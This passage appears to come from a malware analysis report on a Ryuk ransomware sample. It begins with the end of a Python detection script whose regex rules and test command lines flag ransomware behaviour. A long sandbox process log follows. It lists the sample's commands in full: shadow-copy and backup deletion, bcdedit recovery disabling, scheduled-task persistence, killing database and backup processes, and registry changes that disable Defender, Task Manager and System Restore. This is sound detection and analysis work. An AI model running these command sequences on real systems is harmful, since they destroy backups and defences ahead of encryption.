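    _rule("service_stop",          "T1489",     r"\b(net1?(\.exe)?\s+stop\s.*\s/y|sc(\.exe)?\s+config\s+\S+\s+start=\s*disabled)\b"),
    _rule("kill_db_backup",        "T1489",     r"\btaskkill(\.exe)?\s.*\s/im\s+(sql|veeam|msexchange|microsoft\.exchange|pvx|dbsrv)"),
    _rule("acl_everyone_full",     "T1222.001", r"\bicacls(\.exe)?\s.*\s/grant\s+everyone:\(oi\)\(ci\)f\b"),
    _rule("event_log_clear",       "T1070.001", r"\bwevtutil(\.exe)?\s+(cl|clear-log)\s"),
]

# Constructed batch of process command lines (Sysmon event 1 CommandLine shape). All but the
# wevtutil line are copied from this report; wevtutil cl is constructed (see lead-in).
CMDLINES = [
    "vssadmin Delete Shadows /All /Quiet",
    "wmic shadowcopy delete",
    "bcdedit /set {default} recoveryenabled no",
    "bcdedit /set {default} boostatuspolicy ignoreallfailures",
    "wbadmin delete catalog -quiet/",
    r"C:\Windows\system32\cmd.exe /c del /s /f /q c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win",
    r"schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F",
    r'C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"',
    r"attrib +h +s C:\ProgramData\ryuk.exe",
    r"reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f",
    r"reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F",
    "net stop avpsus /y",
    "sc config SQLWriter start= disabled",
    "taskkill /f /t /im veeam*",
    "icacls * /grant Everyone:(OI)(CI)F /T /C /Q",
    "wevtutil cl Security",
    # benign administrative use of the same binaries: none of these should fire
    "vssadmin list shadows",
    r'schtasks /Query /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"',
    r"attrib -r C:\Users\Admin\Documents\report.txt",
]


def match_rules(cmdline):
    """All rules whose pattern occurs in one command line."""
    return [r for r in RULES if r.pattern.search(cmdline)]


def evaluate(cmdlines):
    """(rule name, technique, command line) for every hit across a batch of events."""
    return [(r.name, r.technique, c) for c in cmdlines for r in match_rules(c)]


def technique_counts(cmdlines):
    """How many events in the batch hit each technique."""
    return Counter(t for _, t, _ in evaluate(cmdlines))


def ransomware_like(cmdlines, min_techniques=3):
    """Alert when recovery is being inhibited (T1490) and the batch shows at least
    min_techniques distinct techniques; a lone shadow-copy deletion also occurs in
    legitimate storage maintenance and should only produce a hunt lead."""
    counts = technique_counts(cmdlines)
    return "T1490" in counts and len(counts) >= min_techniques


if __name__ == "__main__":
    for name, technique, cmdline in evaluate(CMDLINES):
        print(f"{technique:10} {name:22} {cmdline}")
    print("ransomware-like:", ransomware_like(CMDLINES))
```

In production the batch would be the events sharing a process-tree root within a short window, so that the cmd.exe wrappers (which match the same patterns as the tools they launch) are counted once per chain rather than once per process.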

Processes

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

